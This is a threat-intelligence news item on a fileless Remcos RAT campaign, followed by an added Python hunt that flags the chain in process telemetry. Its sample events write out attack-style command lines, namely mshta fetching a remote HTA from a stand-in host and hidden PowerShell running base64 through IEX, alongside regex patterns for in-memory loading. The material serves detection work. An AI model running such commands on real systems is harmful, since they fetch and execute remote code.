Researchers have detailed a new malware campaign that deploys Remcos RAT through a PowerShell loader. The attackers distribute malicious LNK files inside ZIP archives, often disguised as official Office documents. Using tax-related lures, the LNK invokes mshta.exe to execute a remote HTA file containing VBScript; the chain ends with a PowerShell script that decodes the Remcos RAT payload and launches it entirely in memory.
Remcos RAT is a well-known remote access trojan that gives attackers full control of a compromised system for espionage and data theft.
It gathers system information, logs keystrokes, captures the screen, and connects to a command-and-control server. Fileless attacks like this one are attractive to attackers because the payload runs directly in memory, leaving very few traces on disk and evading many traditional, file-scanning security solutions.
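Because the payload never touches disk, the practical place to catch this chain is process-creation telemetry. As an added example (not code from the original article or from the researchers it cites), the following Python hunt scores Sysmon-style process-creation events for the behaviour described above: mshta.exe launched from the shell with a remote HTA URL, and a PowerShell child of a script host that decodes and executes content in memory. The event records, field names, indicator names, regexes and the two-hit threshold are assumptions for illustration, not the campaign's actual artefacts.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style). Field names are assumed."""
    image: str
    command_line: str
    parent_image: str


# Indicators for the chain: LNK -> mshta.exe fetching a remote HTA -> PowerShell
# decoding and running the payload in memory. Patterns are illustrative, not exhaustive.
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
HTA_EXT = re.compile(r"\.hta\b", re.IGNORECASE)
PS_MEMORY_LOAD = re.compile(
    r"-e(nc|ncodedcommand)?\b|FromBase64String|\bIEX\b|Invoke-Expression"
    r"|\[System\.Reflection\.Assembly\]::Load|VirtualAlloc",
    re.IGNORECASE,
)
PS_HIDDEN = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b", re.IGNORECASE)
SCRIPT_HOSTS = ("mshta.exe", "wscript.exe", "cscript.exe")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(evt: ProcEvent) -> list:
    """Return the list of indicator names that match a single event."""
    hits = []
    img = basename(evt.image)
    parent = basename(evt.parent_image)
    cmd = evt.command_line
    if img == "mshta.exe":
        if REMOTE_URL.search(cmd):
            hits.append("mshta_remote_url")        # HTA pulled from the internet
        if HTA_EXT.search(cmd):
            hits.append("mshta_hta_argument")
        if parent == "explorer.exe":
            hits.append("mshta_from_shell")        # user double-clicked an LNK
    if img in ("powershell.exe", "pwsh.exe"):
        if parent in SCRIPT_HOSTS:
            hits.append("powershell_from_script_host")
        if PS_MEMORY_LOAD.search(cmd):
            hits.append("powershell_inmemory_decode")  # decode-and-run without a file
        if PS_HIDDEN.search(cmd):
            hits.append("powershell_hidden_window")
    return hits


def hunt(events, min_hits: int = 2) -> list:
    """Return (event, hits) pairs for events with at least min_hits indicators.

    A single indicator is common in benign administration; requiring two keeps
    noise down while still catching each stage of the described chain.
    """
    flagged = []
    for evt in events:
        hits = score_event(evt)
        if len(hits) >= min_hits:
            flagged.append((evt, hits))
    return flagged


# Constructed sample telemetry (not real logs): two malicious stages and two benign events.
SAMPLE_EVENTS = [
    ProcEvent(
        image=r"C:\Windows\System32\mshta.exe",
        command_line=r'"C:\Windows\System32\mshta.exe" https://example.invalid/tax/refund.hta',
        parent_image=r"C:\Windows\explorer.exe",
    ),
    ProcEvent(
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        command_line=(
            r'powershell.exe -nop -w hidden -c "IEX([Text.Encoding]::UTF8.GetString('
            r"[Convert]::FromBase64String('QUJD')))\""
        ),
        parent_image=r"C:\Windows\System32\mshta.exe",
    ),
    ProcEvent(  # benign scheduled backup: one weak hit only (-NoProfile)
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        command_line=r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
        parent_image=r"C:\Windows\explorer.exe",
    ),
    ProcEvent(  # benign installer running a local HTA: one hit only
        image=r"C:\Windows\System32\mshta.exe",
        command_line=r"mshta.exe C:\Windows\Temp\installer.hta",
        parent_image=r"C:\Windows\System32\msiexec.exe",
    ),
]

if __name__ == "__main__":
    for evt, hits in hunt(SAMPLE_EVENTS):
        print(basename(evt.image), "<-", basename(evt.parent_image), hits)
```

Run against the constructed events, the hunt flags only the mshta.exe and PowerShell stages of the chain and leaves the two benign events alone. In production the same scoring would be fed from Sysmon Event ID 1 or Windows Security event 4688 with command-line auditing enabled, and the threshold tuned against the environment's own baseline.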
A new multi-stage .NET loader, detailed by Unit 42 and Threatray, delivers a range of commodity malware and hides its payloads with steganography, embedding them in bitmap resources. Other active threats include trojanized KeePass installers that drop Cobalt Strike beacons and steal credentials.
Lumma Stealer is also being spread via ClickFix lures, and Formbook through malicious Office documents.
These conventional campaigns are increasingly complemented by AI-powered ones. Such campaigns use polymorphic techniques, mutating malware in real time to sidestep signature-based detection. AI also automates malware development, scales attacks broadly, and personalizes phishing messages at volume. Because these messages can slip past traditional email filters, they highlight the need for post-delivery detection.